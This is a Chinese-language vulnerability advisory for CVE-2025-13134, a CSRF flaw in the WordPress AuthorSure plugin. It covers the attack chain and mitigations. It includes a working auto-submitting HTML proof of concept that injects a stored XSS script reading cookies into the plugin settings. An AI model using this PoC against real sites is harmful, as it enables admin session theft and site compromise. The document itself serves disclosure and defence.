CVE-2025-13134 CVSS 6.1 中危

CVE-2025-13134 WordPress AuthorSure插件CSRF漏洞可注入恶意脚本

披露日期: 2025-11-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13134

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AuthorSure WordPress Plugin

漏洞概述

CVE-2025-13134是WordPress AuthorSure插件中的一个中危跨站请求伪造(CSRF)漏洞。该漏洞存在于插件的'authorsure'页面，由于缺少正确的nonce验证机制，导致未经身份验证的攻击者可以通过构造恶意请求，诱使已登录的网站管理员执行非预期的操作。攻击者利用此漏洞可以修改插件设置、注入恶意Web脚本（如XSSPayload），进而窃取管理员会话凭证、劫持管理员账户或对网站访问者进行进一步攻击。由于该漏洞利用需要管理员交互（如点击恶意链接），因此攻击复杂度较低，但潜在危害严重。

技术细节

AuthorSure插件在处理'authorsure'管理页面请求时，未对操作进行有效的CSRF token(nonce)验证。攻击者可以构造一个包含恶意参数的表单或URL，当管理员访问时会自动提交到目标网站的wp-admin接口。由于浏览器会自动携带目标站点的Cookie，服务器会认为这是管理员的合法操作。漏洞利用的关键在于：1)插件的设置更新接口缺少nonce验证；2)攻击者可以控制设置值包括可能存储型XSS payload；3)设置保存后会在前端页面渲染时执行恶意脚本。攻击者通常通过社交工程手段（如钓鱼邮件）诱导管理员点击恶意链接完成攻击。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意表单的HTML页面，表单指向目标网站的AuthorSure插件设置接口

STEP 2

步骤2

攻击者通过钓鱼邮件、社交媒体或恶意网站诱导WordPress管理员点击链接

STEP 3

步骤3

管理员浏览器自动向目标站点发送POST请求，携带管理员的认证Cookie

STEP 4

步骤4

服务器因缺少nonce验证而接受请求，执行攻击者指定的操作（如保存恶意脚本到设置中）

STEP 5

步骤5

当管理员或其他用户访问包含恶意设置的页面时，XSS payload被执行，窃取会话或执行恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-13134 -->
<html>
<body>
<form action="http://target-site/wp-admin/admin.php?page=authorsure" method="POST" enctype="application/x-www-form-urlencoded">
  <input type="hidden" name="authorsure_option" value="malicious_script">
  <input type="hidden" name="authorsure_value" value="<script>alert(document.cookie)</script>">
  <input type="hidden" name="action" value="update">
  <input type="submit" value="Submit request">
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>

影响范围

AuthorSure Plugin <= 2.3

防御指南

临时缓解措施

临时缓解措施：1)暂时禁用AuthorSure插件直到官方补丁发布；2)对管理员进行安全培训，提高对钓鱼攻击的警惕性；3)使用WAF(Web应用防火墙)规则检测异常的CSRF请求模式；4)启用WordPress的双因素认证以增强管理员账户安全；5)定期审查插件设置和用户权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表